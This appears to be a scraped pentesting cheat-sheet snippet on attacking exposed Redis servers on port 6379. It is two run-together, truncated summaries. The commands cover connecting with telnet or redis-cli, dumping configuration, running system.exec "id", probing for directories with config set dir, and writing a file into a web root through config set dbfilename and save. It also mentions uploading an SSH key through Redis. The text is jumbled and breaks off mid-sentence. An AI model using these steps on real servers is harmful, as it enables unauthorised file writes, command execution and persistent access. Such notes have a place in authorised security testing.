-
Enumeration Mandatory Try to connect:telnet $target 6379 // or: redis-cli -h $target...infoCONFIG GET *system.exec "id" Try to check if you can determine the existence of directories.config set dir /var/www/htdocs-ERR Changing directory: No such file or directoryconfig set dir /etc+OK Try to write. General commands:config set dir /var/www/html+OKconfig set dbfilename t.txt+OKset test "hallo"+OKsave+OK Possible places: Upload a…
-
Runs on port 6379 — needs a full nmap scan! If conection is possible via telnet, useful commands are: info CONFIG GET * all keys: keys * It is possible to determine which directories exist: config set dir /var/www/htdocs -ERR Changing directory: No such file or directory set dir /var/www +OK set dir /var/www/html +OK Upload SSH key via redis…